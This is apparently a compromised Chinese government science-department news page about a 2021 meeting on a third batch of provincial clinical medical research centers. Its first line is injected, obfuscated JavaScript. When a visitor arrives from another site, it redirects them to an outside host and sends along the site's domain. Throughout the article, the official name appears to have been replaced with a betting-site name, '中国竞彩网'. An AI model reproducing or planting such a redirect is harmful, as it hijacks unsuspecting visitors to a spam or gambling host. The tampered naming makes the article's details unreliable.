var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 工作动态

中国竞彩网第三批省级临床医学研究中心启动建设


发布日期:2021-09-30 17:58来源:社会发展科技处 阅读次数:

  9月29日,省科技厅组织召开了第三批省临床医学研究中心建设工作推进会。省卫健委、药监局相关负责同志,中心主任及各依托单位负责人参加会议。

  会上,首批评估为优秀的省妇产疾病(生殖医学)临床医学研究中心和省眼科疾病临床医学研究中心代表分别介绍了先进建设经验。第三批心血管疾病、呼吸疾病、康复临床医学研究中心主任和依托单位负责同志就下一步工作思路及重点进行了研讨。

  会议要求,省级临床医学研究中心下一步要从几个方面发力。一是发挥优势,攥紧拳头,以一流创新平台为目标,不断提升重大疾病防控、公共卫生等技术保障能力,争创国家级科研创新平台;二是遵循规律,努力开拓,把医药领域关键共性技术的科技创新及成果转化应用作为研究重点,开展高水平临床科研攻关;三是注重体制机制创新,着眼于中国竞彩网疾病防控需求,抓好人才的培养、引进和使用三个关键环节,建立拔尖人才及团队引进机制,构建有利于创新人才成长的环境。